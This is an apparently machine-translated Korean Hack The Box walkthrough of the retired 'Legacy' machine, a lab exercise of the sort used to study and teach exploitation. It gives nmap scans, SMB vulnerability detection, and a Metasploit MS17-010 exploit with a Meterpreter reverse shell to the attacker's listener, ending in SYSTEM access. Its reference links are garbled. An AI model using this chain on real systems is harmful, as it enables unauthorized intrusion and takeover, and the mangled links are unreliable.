【HackTheBox】레거시 - Walkthrough -

이 논문에서는 Hack The Box에서 제공하는 Retired Machines의 Legacy

Hack The Box에 대한 자세한 내용은 "Hack The Box를 즐길 수 있는 Kali Linux 튜닝"을 함께 확인하십시오.

기계 상세





이그제큐티브 요약



도구


  • nmap
  • msfconsole

  • 상세 절차



    네트워크 서비스 스캔



    nmap



    IP 주소 10.10.10.4legacy.htb/etc/hosts에 추가합니다. 그런 다음 nmap 를 사용하여 포트 스캔을 수행합니다. 각 옵션의 목표는 다음과 같습니다.

    -Pn: 스캔 전에 수행되는 ping에서 소통 확인을 하지 않고 스캔합니다.
    -T4: 타이밍 템플릿을 설정합니다. 이번에는 "aggressive (4)"를 사용하고 있습니다. TCP 포트에 대한 스캔 처리의 동적 지연 시간이 10ms를 넘지 않도록 되어 있습니다.
    -A: OS 검색 및 버전 검색을 활성화합니다.
    -v: 중복 모드, 상세를 출력합니다.

    Nmap Network Scanning, h tps : // 응마 p. rg/만/자/만-b 리에후 p치온 s. HTML
    kali@kali:~$ nmap -Pn -T4 -A -v legacy.htb
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:26 EDT
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 03:26
    Completed NSE at 03:26, 0.00s elapsed
    Initiating NSE at 03:26
    Completed NSE at 03:26, 0.00s elapsed
    Initiating NSE at 03:26
    Completed NSE at 03:26, 0.00s elapsed
    Initiating Connect Scan at 03:26
    Scanning legacy.htb (10.10.10.4) [1000 ports]
    Discovered open port 139/tcp on 10.10.10.4
    Discovered open port 445/tcp on 10.10.10.4
    Completed Connect Scan at 03:27, 27.82s elapsed (1000 total ports)
    Initiating Service scan at 03:27
    Scanning 2 services on legacy.htb (10.10.10.4)
    Completed Service scan at 03:27, 6.84s elapsed (2 services on 1 host)
    NSE: Script scanning 10.10.10.4.
    Initiating NSE at 03:27
    Completed NSE at 03:28, 51.87s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Nmap scan report for legacy.htb (10.10.10.4)
    Host is up (0.20s latency).
    Not shown: 997 filtered ports
    PORT     STATE  SERVICE       VERSION
    139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open   microsoft-ds  Windows XP microsoft-ds
    3389/tcp closed ms-wbt-server
    Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
    
    Host script results:
    |_clock-skew: mean: 5d00h29m24s, deviation: 2h07m15s, median: 4d22h59m25s
    | nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:7e:96 (VMware)
    | Names:
    |   LEGACY<00>           Flags: <unique><active>
    |   HTB<00>              Flags: <group><active>
    |   LEGACY<20>           Flags: <unique><active>
    |   HTB<1e>              Flags: <group><active>
    |   HTB<1d>              Flags: <unique><active>
    |_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
    | smb-os-discovery: 
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   OS CPE: cpe:/o:microsoft:windows_xp::-
    |   Computer name: legacy
    |   NetBIOS computer name: LEGACY\x00
    |   Workgroup: HTB\x00
    |_  System time: 2020-09-02T12:26:41+03:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    |_smb2-time: Protocol negotiation failed (SMB2)
    
    NSE: Script Post-scanning.
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Initiating NSE at 03:28
    Completed NSE at 03:28, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds
    

    이제 목표에서 실행중인 서비스가 밝혀졌습니다. 특히 신경이 쓰이는 것은 다음과 같습니다.


    포트 번호
    서비스
    버전


    139/tcp
    netbios-ssn
    Microsoft Windows netbios-ssn

    445/tcp
    microsoft-ds
    Windows XP microsoft-ds


    SMB 서비스 스캔


    SMB 서비스의 상세를 열거해 봅시다. rpcclient 명령을 실행합니다. 불행히도 익명 연결을 지원하지 않는 것 같습니다.
    kali@kali:~$ rpcclient -U "" legacy.htb
    Enter WORKGROUP\'s password: 
    Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
    
    nmap 에서는, Nmap Script Engine 에 의해 Lua 스크립트 언어에 의해, 네트워크 처리를 자동화하는 스크립트를 쓸 수가 있습니다.
    이번에는 -script 옵션을 지정하고 SMB 취약점에 대한 스크립트를 한꺼번에 legacy.htb로 스캔합니다.
    kali@kali:~$ nmap -Pn -v -script smb-vuln* -p 139,445 10.10.10.4
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:48 EDT
    NSE: Loaded 11 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 03:48
    Completed NSE at 03:48, 0.00s elapsed
    Initiating Connect Scan at 03:48
    Scanning legacy.htb (10.10.10.4) [2 ports]
    Discovered open port 139/tcp on 10.10.10.4
    Discovered open port 445/tcp on 10.10.10.4
    Completed Connect Scan at 03:48, 0.28s elapsed (2 total ports)
    NSE: Script scanning 10.10.10.4.
    Initiating NSE at 03:48
    Completed NSE at 03:48, 6.76s elapsed
    Nmap scan report for legacy.htb (10.10.10.4)
    Host is up (0.28s latency).
    
    PORT    STATE SERVICE
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-vuln-ms08-067: 
    |   VULNERABLE:
    |   Microsoft Windows system vulnerable to remote code execution (MS08-067)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2008-4250
    |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
    |           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
    |           code via a crafted RPC request that triggers the overflow during path canonicalization.
    |           
    |     Disclosure date: 2008-10-23
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
    |_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
    | smb-vuln-ms17-010: 
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |           
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    
    NSE: Script Post-scanning.
    Initiating NSE at 03:48
    Completed NSE at 03:48, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
    

    그 결과 MS17-010(CVE-2017-0143)의 취약점이 있음을 확인할 수 있었습니다.

    Metasploit 사용



    공격 모듈 검색


    Metasploit Framework 에서 MS17-010(CVE-2017-0143) 에 해당하는 코드를 검색해 봅니다.
    kali@kali:~$ msfconsole
    msf5 > search cve-2017-0143
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
       2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
       5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
    
    
    Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
    
    4 exploit/windows/smb/ms17_010_psexec 를 사용할 수 있을 것 같습니다.

    공격 모듈 설정


    use 명령으로 이전에 검색한 모듈의 사용을 선언합니다.
    선언에 성공하면 프롬프트가 msf5 exploit(windows/smb/ms17_010_psexec) >로 바뀝니다.
    msf5 > use exploit/windows/smb/ms17_010_psexec 
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_psexec) > 
    

    모듈에서 설정할 항목을 options 명령으로 확인하십시오.
    이 중 [Required]가 [yes]로 되어 있는 항목은 설정 필수 항목입니다.
    이 경우 [DBGTRACE], [LEAKATTEMPTS], [NAMED_PIPES], [RHOSTS], [RPORT], [SHARE]입니다.
    그러나 [RHOST] 이외의 항목은 이미 값이 설정되어 있는지 확인할 수 있습니다. 따라서 이번에는 [RHOSTS]만을 설정하면 설정 완료입니다.
    msf5 exploit(windows/smb/ms17_010_psexec) > options
    
    Module options (exploit/windows/smb/ms17_010_psexec):
    
       Name                  Current Setting                                                 Required  Description
       ----                  ---------------                                                 --------  -----------
       DBGTRACE              false                                                           yes       Show extra debug trace info
       LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
       NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
       NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT                 445                                                             yes       The Target port (TCP)
       SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
       SERVICE_DISPLAY_NAME                                                                  no        The service display name
       SERVICE_NAME                                                                          no        The service name
       SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain             .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                               no        The password for the specified username
       SMBUser                                                                               no        The username to authenticate as
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     10.10.14.5       yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    msf5 exploit(windows/smb/ms17_010_psexec) >
    

    [RHOSTS]에 설정할 값은 The target host(s)입니다.
    즉, legacy.htb 의 IP 주소를 설정해야 합니다. 값을 설정하려면 set 명령을 사용합니다.
    set 設定名 設定値
    

    이 경우 다음 명령 구문으로 설정할 수 있습니다.
    msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
    rhost => 10.10.10.4
    msf5 exploit(windows/smb/ms17_010_psexec) > 
    

    공격 모듈 실행


    exploit 명령에서 익스플로잇 코드를 실행합니다.
    msf5 exploit(windows/smb/ms17_010_psexec) > exploit
    
    [*] Started reverse TCP handler on 10.10.14.5:4444 
    [*] 10.10.10.4:445 - Target OS: Windows 5.1
    [*] 10.10.10.4:445 - Filling barrel with fish... done
    [*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
    [*] 10.10.10.4:445 -    [*] Preparing dynamite...
    [*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
    [*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
    [*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
    [*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
    [*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821167c0
    [*] 10.10.10.4:445 - Built a write-what-where primitive...
    [+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
    [*] 10.10.10.4:445 - Selecting native target
    [*] 10.10.10.4:445 - Uploading payload... CWqoNatO.exe
    [*] 10.10.10.4:445 - Created \CWqoNatO.exe...
    [+] 10.10.10.4:445 - Service started successfully...
    [*] Sending stage (176195 bytes) to 10.10.10.4
    [*] 10.10.10.4:445 - Deleting \CWqoNatO.exe...
    [*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1032) at 2020-08-28 04:04:05 -0400
    
    meterpreter 프롬프트가 표시됩니다.getuid 명령으로 권한을 확인하면 NT AUTHORITY\SYSTEM 권한을 얻는 데 성공했는지 확인할 수 있습니다.
    이것으로, legacy.htb 머신의 장악에 성공이 됩니다.
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    



    참고 정보



    Walkthrough


  • htps // 0xdf. 기 t b. 이오/2019/02/21/HTB-ぇ가 cy. HTML
  • htps : // 메이 m. 이 m / @ 라나 k는 ぃ l101 / ㅇ ぇ ー ー ー ー ー ー ぇ가 cy ー ー ー ー ー ー ー ー

  • @ 산포 _ 시호 "【Hack the Box write-up】Legacy "

  • @ 유키 츠카이 47 "Hack The Box[Legacy] -Writeup- "

  • 기타


  • Cybrary Whitepaper “Guerrilla Red Team: Decentralize the Adversary ”, Christopher Cottrell , 2020/8/3
  • "DEF CON 28 : 레드 팀 빌리지 : 적을 걷어차는 게릴라 레드 팀 구축 "
  • 좋은 웹페이지 즐겨찾기